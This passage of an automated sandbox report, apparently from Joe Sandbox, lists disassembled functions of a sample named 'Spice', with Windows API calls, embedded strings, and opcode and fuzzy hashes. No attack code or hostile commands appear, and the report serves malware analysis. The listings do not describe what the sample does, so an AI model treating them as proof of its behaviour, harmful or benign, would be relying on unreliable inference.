                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: __wcsnicmp
                                                                                                                                                                                                                                      • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                                                                                                                                                                      • API String ID: 1038674560-1810252412
                                                                                                                                                                                                                                      • Opcode ID: adbf4fcbb435de9d4293e27c56c872aabd123c3405bd794e07076a002b2ef8e3
                                                                                                                                                                                                                                      • Instruction ID: d5524df52c2685a262d6a7664765514abfe2d3174c91ceaea09688e435679fbb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: adbf4fcbb435de9d4293e27c56c872aabd123c3405bd794e07076a002b2ef8e3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E231C130A40215A7CB14FB60EE43FED77F8AF20750F202129F549B10E6EF66AE069657
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadIconW.USER32(00000063), ref: 00ECCBAA
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00ECCBBC
                                                                                                                                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 00ECCBD3
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 00ECCBE8
                                                                                                                                                                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 00ECCBEE
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00ECCBFE
                                                                                                                                                                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 00ECCC04
                                                                                                                                                                                                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00ECCC25
                                                                                                                                                                                                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00ECCC3F
                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00ECCC48
                                                                                                                                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 00ECCCB3
                                                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 00ECCCB9
                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000), ref: 00ECCCC0
                                                                                                                                                                                                                                      • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00ECCD0C
                                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 00ECCD19
                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00ECCD3E
                                                                                                                                                                                                                                      • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00ECCD69
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3869813825-0
                                                                                                                                                                                                                                      • Opcode ID: c558f25720944e14542c81fb8871da2d9000dfd442355271c060622d99924222
                                                                                                                                                                                                                                      • Instruction ID: 3a8ed11814607a8a858c5655b39ffa419632a4c16f5a86b0a555c5653ba8e435
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c558f25720944e14542c81fb8871da2d9000dfd442355271c060622d99924222
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 46516E70900709AFDB20DFA8CE85FAEBBF5FF44705F10091CE54AA25A0CB76A915DB50
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00EFA87E
                                                                                                                                                                                                                                      • DestroyWindow.USER32(?,?), ref: 00EFA8F8
                                                                                                                                                                                                                                        • Part of subcall function 00E81821: _memmove.LIBCMT ref: 00E8185B
                                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00EFA972
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00EFA994
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00EFA9A7
                                                                                                                                                                                                                                      • DestroyWindow.USER32(00000000), ref: 00EFA9C9
                                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00E70000,00000000), ref: 00EFAA00
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00EFAA19
                                                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 00EFAA32
                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000), ref: 00EFAA39
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00EFAA51
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00EFAA69
                                                                                                                                                                                                                                        • Part of subcall function 00E729AB: GetWindowLongW.USER32(?,000000EB), ref: 00E729BC
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                                                                                                                                                                                      • String ID: 0$tooltips_class32
                                                                                                                                                                                                                                      • API String ID: 1297703922-3619404913
                                                                                                                                                                                                                                      • Opcode ID: 4d6b2178f785081fa1838548c1207f13802f8dba8808b87cca5dbde0876deee5
                                                                                                                                                                                                                                      • Instruction ID: 5e51524041d7361cbf3b0a64c3400e46f1f7cca4f795d8cb43de47c3af38d26f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4d6b2178f785081fa1838548c1207f13802f8dba8808b87cca5dbde0876deee5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A1719DB0140208AFD721DF28CC49F7677E6FB88304F58052DFA89AB2A1DB71E915DB52
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00E729E2: GetWindowLongW.USER32(?,000000EB), ref: 00E729F3
                                                                                                                                                                                                                                      • DragQueryPoint.SHELL32(?,?), ref: 00EFCCCF
                                                                                                                                                                                                                                        • Part of subcall function 00EFB1A9: ClientToScreen.USER32(?,?), ref: 00EFB1D2
                                                                                                                                                                                                                                        • Part of subcall function 00EFB1A9: GetWindowRect.USER32(?,?), ref: 00EFB248
                                                                                                                                                                                                                                        • Part of subcall function 00EFB1A9: PtInRect.USER32(?,?,00EFC6BC), ref: 00EFB258
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00EFCD38
                                                                                                                                                                                                                                      • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00EFCD43
                                                                                                                                                                                                                                      • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00EFCD66
                                                                                                                                                                                                                                      • _wcscat.LIBCMT ref: 00EFCD96
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00EFCDAD
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00EFCDC6
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00EFCDDD
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00EFCDFF
                                                                                                                                                                                                                                      • DragFinish.SHELL32(?), ref: 00EFCE06
                                                                                                                                                                                                                                      • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00EFCEF9
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                                                                                                                                                                                      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                                                                                                                                      • API String ID: 169749273-3440237614
                                                                                                                                                                                                                                      • Opcode ID: 83b5a80a297e085660f3ae726a075fa832016b4164f6d4c30306c16b68dfb3a3
                                                                                                                                                                                                                                      • Instruction ID: 507f3fe4ccde8feeb221237a739ba68437f020070170780e666b3efbf031d030
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 83b5a80a297e085660f3ae726a075fa832016b4164f6d4c30306c16b68dfb3a3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 24616D71108305AFC711EF50DC85EAFBBE9FF88350F100A1DF699A21A1DB719A49DB52
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • VariantInit.OLEAUT32(00000000), ref: 00ED831A
                                                                                                                                                                                                                                      • VariantCopy.OLEAUT32(00000000,?), ref: 00ED8323
                                                                                                                                                                                                                                      • VariantClear.OLEAUT32(00000000), ref: 00ED832F
                                                                                                                                                                                                                                      • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00ED841D
                                                                                                                                                                                                                                      • __swprintf.LIBCMT ref: 00ED844D
                                                                                                                                                                                                                                      • VarR8FromDec.OLEAUT32(?,?), ref: 00ED8479
                                                                                                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 00ED852A
                                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 00ED85BE
                                                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 00ED8618
                                                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 00ED8627
                                                                                                                                                                                                                                      • VariantInit.OLEAUT32(00000000), ref: 00ED8665
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                                                                                                                                                                                      • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                                                                                                                                                                      • API String ID: 3730832054-3931177956
                                                                                                                                                                                                                                      • Opcode ID: 72e8c48f2943e2c5963b741084c1de706407cd999f8f10cef9e6a3c71db805d0
                                                                                                                                                                                                                                      • Instruction ID: 55eccd96eb6e3ded8c73bb96ccd5efdf4d1a79d9b87beac44bfbe69a6954c8dc
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 72e8c48f2943e2c5963b741084c1de706407cd999f8f10cef9e6a3c71db805d0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 41D1CC71604515EFDB249F65D984BAEB7B8FF04B00F24A156E419BB380DF30E942DBA1
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CharUpperBuffW.USER32(?,?), ref: 00EF4A61
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00EF4AAC
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: BuffCharMessageSendUpper
                                                                                                                                                                                                                                      • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                                                                                                                                      • API String ID: 3974292440-4258414348
                                                                                                                                                                                                                                      • Opcode ID: f7696a5ed39ca788aa3bc9bbfc200d149968b5443a1419050fcd3c18fd5a86cf
                                                                                                                                                                                                                                      • Instruction ID: 4d0c41d1e5019bea16126c85c9d05cdc28a6de62df3c8f3d2e19156dcbd7112d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f7696a5ed39ca788aa3bc9bbfc200d149968b5443a1419050fcd3c18fd5a86cf
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 52916CB02046159FCB14EF20C451A6EB7E1AF94354F14A85CF99A6B3E2DB31ED4ACB81
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetLocalTime.KERNEL32(?), ref: 00EDE31F
                                                                                                                                                                                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00EDE32F
                                                                                                                                                                                                                                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00EDE33B
                                                                                                                                                                                                                                      • __wsplitpath.LIBCMT ref: 00EDE399
                                                                                                                                                                                                                                      • _wcscat.LIBCMT ref: 00EDE3B1
                                                                                                                                                                                                                                      • _wcscat.LIBCMT ref: 00EDE3C3
                                                                                                                                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00EDE3D8
                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00EDE3EC
                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00EDE41E
                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00EDE43F
                                                                                                                                                                                                                                      • _wcscpy.LIBCMT ref: 00EDE44B
                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00EDE48A
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                                                                                                                                                                                      • String ID: *.*
                                                                                                                                                                                                                                      • API String ID: 3566783562-438819550
                                                                                                                                                                                                                                      • Opcode ID: e958b7833b13affaef4fd6ef3840cc6b7e6a621de4caca588a0b4ad65e84e2a5
                                                                                                                                                                                                                                      • Instruction ID: 4b80b82b3f4f9855e397f158b7e7fdaba1401cf08fa478cb481b36a7eb702b38
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e958b7833b13affaef4fd6ef3840cc6b7e6a621de4caca588a0b4ad65e84e2a5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E5615AB25043059FCB10EF60C845A9EB3E8FF89314F04991EF999AB351DB35E946CB92
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00EDA2C2
                                                                                                                                                                                                                                        • Part of subcall function 00E81A36: _memmove.LIBCMT ref: 00E81A77
                                                                                                                                                                                                                                      • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00EDA2E3
                                                                                                                                                                                                                                      • __swprintf.LIBCMT ref: 00EDA33C
                                                                                                                                                                                                                                      • __swprintf.LIBCMT ref: 00EDA355
                                                                                                                                                                                                                                      • _wprintf.LIBCMT ref: 00EDA3FC
                                                                                                                                                                                                                                      • _wprintf.LIBCMT ref: 00EDA41A
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: LoadString__swprintf_wprintf$_memmove
                                                                                                                                                                                                                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                                                                                                                                                                      • API String ID: 311963372-3080491070
                                                                                                                                                                                                                                      • Opcode ID: 3325b7fbee216fa630b38b1970d04a8391d56498ef62d9ccf3f4a5163f516701
                                                                                                                                                                                                                                      • Instruction ID: 3d9ee752c9d708a5ac2f583756934ec65e4669627f9d7b88d4af66cb06084fe4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3325b7fbee216fa630b38b1970d04a8391d56498ef62d9ccf3f4a5163f516701
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A851B071800219AACF14FBE0DD46EEEB7B9EF04340F1401A6F408B2162DB316F46EB51
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,00EBF8B8,00000001,0000138C,00000001,00000000,00000001,?,00EE3FF9,00000000), ref: 00ED009A
                                                                                                                                                                                                                                      • LoadStringW.USER32(00000000,?,00EBF8B8,00000001), ref: 00ED00A3
                                                                                                                                                                                                                                        • Part of subcall function 00E81A36: _memmove.LIBCMT ref: 00E81A77
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,00F37310,?,00000FFF,?,?,00EBF8B8,00000001,0000138C,00000001,00000000,00000001,?,00EE3FF9,00000000,00000001), ref: 00ED00C5
                                                                                                                                                                                                                                      • LoadStringW.USER32(00000000,?,00EBF8B8,00000001), ref: 00ED00C8
                                                                                                                                                                                                                                      • __swprintf.LIBCMT ref: 00ED0118
                                                                                                                                                                                                                                      • __swprintf.LIBCMT ref: 00ED0129
                                                                                                                                                                                                                                      • _wprintf.LIBCMT ref: 00ED01D2
                                                                                                                                                                                                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00ED01E9
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                                                                                                                                                                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                                                                                                                      • API String ID: 984253442-2268648507
                                                                                                                                                                                                                                      • Opcode ID: c71b24f4ba1866168f935625f1460d23e7395d8c507b496b652ca000222f0bb1
                                                                                                                                                                                                                                      • Instruction ID: 9dd245d34c0c6eb69ee753edbb6c76d72f112770bbd8a50d046bf0f6931d94ab
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c71b24f4ba1866168f935625f1460d23e7395d8c507b496b652ca000222f0bb1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 52415E72800219AACF14FBE0DD86EEEB7BDEF54340F501195F509B2192EA356F0ADB61
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00E74D37: __itow.LIBCMT ref: 00E74D62
                                                                                                                                                                                                                                        • Part of subcall function 00E74D37: __swprintf.LIBCMT ref: 00E74DAC
                                                                                                                                                                                                                                      • CharLowerBuffW.USER32(?,?), ref: 00EDAA0E
                                                                                                                                                                                                                                      • GetDriveTypeW.KERNEL32 ref: 00EDAA5B
                                                                                                                                                                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00EDAAA3
                                                                                                                                                                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00EDAADA
                                                                                                                                                                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00EDAB08
                                                                                                                                                                                                                                        • Part of subcall function 00E81821: _memmove.LIBCMT ref: 00E8185B
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                                                                                                                                                                                      • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                                                                                                                      • API String ID: 2698844021-4113822522
                                                                                                                                                                                                                                      • Opcode ID: d2454019100d95f0aa331bd4eb5a40280b694dfb6b7ca835368b931441977791
                                                                                                                                                                                                                                      • Instruction ID: e6dd637abfedb0e01ecda85cc42a3f746e18134801d75c8d431ceb4c40aff783
